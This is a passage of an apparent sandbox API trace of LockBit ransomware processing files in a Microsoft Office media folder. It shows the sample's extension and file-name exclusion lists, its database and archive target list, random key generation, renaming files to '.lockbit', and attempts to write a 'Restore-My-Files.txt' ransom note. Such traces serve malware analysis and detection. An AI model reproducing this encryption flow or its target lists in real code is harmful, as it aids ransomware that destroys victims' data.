[0197.731] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287005.WMF") returned 1 [0197.731] lstrcmpiW (lpString1="ntldr", lpString2="J0287005.WMF") returned 1 [0197.731] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287005.WMF") returned 1 [0197.731] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287005.WMF") returned -1 [0197.732] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287005.WMF") returned -1 [0197.732] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287005.WMF") returned 1 [0197.732] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287005.WMF") returned -1 [0197.732] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.732] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF") returned=".WMF" [0197.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.732] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.732] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.733] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF.lockbit") returned 70 [0197.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0287005.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.734] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.734] malloc (_Size=0x40068) returned 0x3df0008 [0197.734] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=45598) returned 1 [0197.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.735] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.740] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.740] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.743] free (_Block=0x1fa2ed8) [0197.743] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.743] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.743] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x948c7400, ftCreationTime.dwHighDateTime=0x1bf1521, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x948c7400, ftLastWriteTime.dwHighDateTime=0x1bf1521, nFileSizeHigh=0x0, nFileSizeLow=0x76ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0291984.WMF", cAlternateFileName="")) returned 1 [0197.743] lstrcmpiW (lpString1=".", lpString2="J0291984.WMF") returned -1 [0197.743] lstrcmpiW (lpString1="..", lpString2="J0291984.WMF") returned -1 [0197.743] PathFindExtensionW (pszPath="J0291984.WMF") returned=".WMF" [0197.743] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.743] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.744] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.744] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0291984.WMF") returned 1 [0197.745] lstrcmpiW (lpString1="ntldr", lpString2="J0291984.WMF") returned 1 [0197.745] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0291984.WMF") returned 1 [0197.745] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0291984.WMF") returned -1 [0197.745] lstrcmpiW (lpString1="autorun.inf", lpString2="J0291984.WMF") returned -1 [0197.745] lstrcmpiW (lpString1="thumbs.db", lpString2="J0291984.WMF") returned 1 [0197.745] lstrcmpiW (lpString1="iconcache.db", lpString2="J0291984.WMF") returned -1 [0197.745] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.745] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF") returned=".WMF" [0197.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.745] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.745] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.746] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.746] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF.lockbit") returned 70 [0197.746] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0291984.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.748] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.748] malloc (_Size=0x40068) returned 0x3df0008 [0197.748] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30442) returned 1 [0197.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.749] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.754] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.754] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.754] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.757] free (_Block=0x1fa2ed8) [0197.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.757] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.757] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9003000, ftCreationTime.dwHighDateTime=0x1bf1521, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc9003000, ftLastWriteTime.dwHighDateTime=0x1bf1521, nFileSizeHigh=0x0, nFileSizeLow=0x7148, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292020.WMF", cAlternateFileName="")) returned 1 [0197.757] lstrcmpiW (lpString1=".", lpString2="J0292020.WMF") returned -1 [0197.757] lstrcmpiW (lpString1="..", lpString2="J0292020.WMF") returned -1 [0197.757] PathFindExtensionW (pszPath="J0292020.WMF") returned=".WMF" [0197.757] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.757] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.758] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.758] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292020.WMF") returned 1 [0197.759] lstrcmpiW (lpString1="ntldr", lpString2="J0292020.WMF") returned 1 [0197.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292020.WMF") returned 1 [0197.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292020.WMF") returned -1 [0197.759] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292020.WMF") returned -1 [0197.759] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292020.WMF") returned 1 [0197.759] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292020.WMF") returned -1 [0197.759] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.759] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF") returned=".WMF" [0197.759] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.759] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.759] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.760] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.760] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF.lockbit") returned 70 [0197.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292020.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.763] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.763] malloc (_Size=0x40068) returned 0x3df0008 [0197.763] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29000) returned 1 [0197.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.764] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.770] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.770] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.770] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.771] free (_Block=0x1fa2ed8) [0197.771] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF" | out: 